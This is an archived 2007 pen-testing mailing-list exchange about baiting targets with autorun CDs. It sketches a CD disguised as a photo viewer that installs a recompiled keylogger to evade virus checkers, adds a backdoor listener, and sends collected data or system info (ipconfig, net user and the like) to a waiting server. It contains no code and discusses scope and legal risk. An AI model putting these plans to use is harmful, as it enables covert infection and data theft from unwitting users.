From: Shenk, Jerry A (jshenk@decommunications.com)
Date: Wed May 02 2007 - 21:28:14 EDT
How about something a little "less intrusive" - just grab ipconfig,
netstat, net user, net share and some other simple basic machine info
and post it to a waiting website. That would be enough to id the
machine, maybe the user, perhaps some other info. For a pen-test, it
would be enough to generate a really interesting write-up on people
putting unknown CDs in their computer and demonstrate the danger of
autorun.
Now, rooting every box that runs the CD...that would be even more
interesting...but, if it's part of a pen-test, I'm not sure where the
problem would be...a user taking the CD home would definitely be
interesting...might be a little tough to keep that in scope. Maybe put
a warning label on it not to remove it from the building;)
-----Original Message-----
From: listbounce@securityfocus.com [mailto:listbounce@securityfocus.com]
On Behalf Of Petr.Kazil@eap.nl
Sent: Wednesday, May 02, 2007 3:00 PM
To: 'Pen-Testing'
Subject: Evil autorun CD - ideas ? downloadable exploits anywhere ?
On the Internet there is much talk about hacking through "evil USB
sticks"
:
http://www.theregister.co.uk/2007/04/25/usb_malware/
I was inspired by a talk by John Craddock where he told the following
anecdote:
- He would bake a stack of CD's and bring them to a conference. The
stack
would gradually "evaporate" as people took a CD - even though the stack
was not marked as "free for taking". When people inserted the CD a tune
would be played. Gradually he would start hearing tunes in the
neighbourhood as people inserted the CD ...
It would be fun to make a few of these CD's and use them during a
pentest.
Of course the payload should be more malicious then.
Question: Has anyone tried this before? Did it work?
Greetings, Petr Kazil
I will try to build a CD that will contain a photo viewer and a set of
innocent pictures. But it will try to install a keylogger and send the
collected data to a temporary server that I will install on the network.
My hope is that if I download C++ keylogger source code, modify it a bit
and compile it myself, that I will be able to evade virus checkers. I
also
might compile and install a network listener backdoor. At the moment I'm
not even dreaming about rootkits and encrypted channels to the outside
world - that's much too difficult for me.
I don't think it will be able to collect password hashes or Active
Directory passwords because the script and programs will be running as a
normal domain user. But anyway it will be an interesting proof of
concept.
I wasn't able to find any exploit details on Google. I just get a lot of
articles about the risks of autorun and ways to disable it ...
This idea has one big risk - suppose someone takes the CD home. Then I
would be committing a criminal act if I exploited his home computer. The
articles about USB-stick pentesting don't mention this risk.
------------------------------------------------------------------------
This List Sponsored by: Cenzic
Are you using SPI, Watchfire or WhiteHat?
Consider getting clear vision with Cenzic
See HOW Now with our 20/20 program!
http://www.cenzic.com/c/2020
------------------------------------------------------------------------
**DISCLAIMER
This e-mail message and any files transmitted with it are intended for the use of the individual or entity to which they are addressed and may contain information that is privileged, proprietary and confidential. If you are not the intended recipient, you may not use, copy or disclose to anyone the message or any information contained in the message. If you have received this communication in error, please notify the sender and delete this e-mail message. The contents do not represent the opinion of D&E except to the extent that it relates to their official business.
------------------------------------------------------------------------
This List Sponsored by: Cenzic
Are you using SPI, Watchfire or WhiteHat?
Consider getting clear vision with Cenzic
See HOW Now with our 20/20 program!
http://www.cenzic.com/c/2020
------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:45 EDT